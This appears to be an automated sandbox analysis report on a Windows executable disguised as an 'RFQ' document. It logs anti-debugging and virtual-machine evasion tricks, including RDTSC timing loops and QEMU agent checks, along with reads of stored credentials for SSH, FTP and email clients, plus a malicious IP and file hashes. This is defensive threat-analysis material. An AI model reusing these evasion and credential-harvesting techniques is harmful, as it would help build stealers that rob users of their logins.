Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 000000000225F19B second address: 000000000225AF91 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp ah, FFFFFFFDh 0x0000000d retn 0010h 0x00000010 test ah, dh 0x00000012 push eax 0x00000013 mov eax, 97C7811Ch 0x00000018 cmp eax, 97C7811Ch 0x0000001d jne 00007F60E0E87385h 0x00000023 pop eax 0x00000024 cmp dword ptr [esp+24h], 01h 0x00000029 jne 00007F60E0E91118h 0x0000002b inc dword ptr [ebp+00000140h] 0x00000031 jmp 00007F60E0E91162h 0x00000033 cmp dl, al 0x00000035 mov ebx, dword ptr [ebp+0000013Ch] 0x0000003b cmp ah, dh 0x0000003d mov dword ptr [esp+28h], ebx 0x00000041 mov ebx, dword ptr [ebp+00000140h] 0x00000047 pushad 0x00000048 mov cl, E2h 0x0000004a cmp cl, FFFFFFE2h 0x0000004d jne 00007F60E0E98AD9h 0x00000053 popad 0x00000054 add dword ptr [ebp+0000013Ch], ebx 0x0000005a cmp dx, bx 0x0000005d pushad 0x0000005e mov esi, 00000000h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 00000000022617FC second address: 00000000022617FC instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000002252771 second address: 0000000002252771 instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000002259E0A second address: 0000000002259E0A instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000002259FCE second address: 0000000002259FCE instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000002258BF2 second address: 0000000002258BF2 instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 00000000022592C7 second address: 00000000022592C7 instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 00000000005675A8 second address: 00000000005675A8 instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000000572AF9 second address: 0000000000572B66 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov ebx, eax 0x0000000c jmp 00007F60E0E91162h 0x0000000e cmp bh, dh 0x00000010 test bh, bh 0x00000012 call 00007F60E0E90F8Fh 0x00000017 call 00007F60E0E91195h 0x0000001c nop 0x0000001d mov eax, dword ptr [esp] 0x00000020 inc eax 0x00000021 ret 0x00000022 ret 0x00000023 pushad 0x00000024 mov edi, 000000B1h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000000572E6B second address: 0000000000572E6B instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000000572DE7 second address: 0000000000572DE7 instructions:

Source: C:\Users\user\Desktop\RFQ No3756368.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: RFQ No3756368.exe, 00000000.00000002.722020026.0000000002270000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: RFQ No3756368.exe, 00000000.00000002.722020026.0000000002270000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Source: C:\Users\user\Desktop\RFQ No3756368.exe TID: 2628	Thread sleep count: 176 > 30			Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe TID: 4044	Thread sleep time: -60000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225767C Start: 0225788C End: 02257765	0_2_0225767C
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022576FE Start: 0225788C End: 02257765	0_2_022576FE
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022575BA Start: 02262B66 End: 02257765	0_2_022575BA
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022575C8 Start: 0225788C End: 02257765	0_2_022575C8

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256710 mov eax, dword ptr fs:[00000030h]	0_2_02256710
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256712 mov eax, dword ptr fs:[00000030h]	0_2_02256712
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02255837 mov eax, dword ptr fs:[00000030h]	0_2_02255837
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226083D mov eax, dword ptr fs:[00000030h]	0_2_0226083D
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02260843 mov eax, dword ptr fs:[00000030h]	0_2_02260843
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225E880 mov eax, dword ptr fs:[00000030h]	0_2_0225E880
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225A0FC mov eax, dword ptr fs:[00000030h]	0_2_0225A0FC
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226091C mov eax, dword ptr fs:[00000030h]	0_2_0226091C
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225F1B5 mov eax, dword ptr fs:[00000030h]	0_2_0225F1B5
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256DB9 mov eax, dword ptr fs:[00000030h]	0_2_02256DB9
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256D91 mov eax, dword ptr fs:[00000030h]	0_2_02256D91

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Source: C:\Users\user\Desktop\RFQ No3756368.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.201.193	googlehosted.l.googleusercontent.com	United States		15169	GOOGLEUS	false
63.141.228.141	unknown	United States		33387	NOCIXUS	true

ID:	434725
Product:	CloudBasic
Start time:	13:01:16
Start date:	15.06.2021
Sample:	RFQ No3756368.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	ce51f15d31008c3606729b00036fe841
SHA1:	9ed0987c6a26f61afb6fa772dce9b4a6ddd9090c
SHA256:	e4effdebb79bd1b3d2e3a2510a96f44cbf9ca4961340c7ca1f276bd3c527afb2
Filetype:	Win32 Executable (generic) a (10002005/4) 99.15%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a	data	80F54DC1616678F37E478AC064CEC423	B8DB85EC31702B48B95A727092A38B446360FCA7	A3AD19CA6EA04695FCD30034EAF389235385F3FA283837316916AF0CDA09DCC0

Windows Analysis Report RFQ No3756368.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs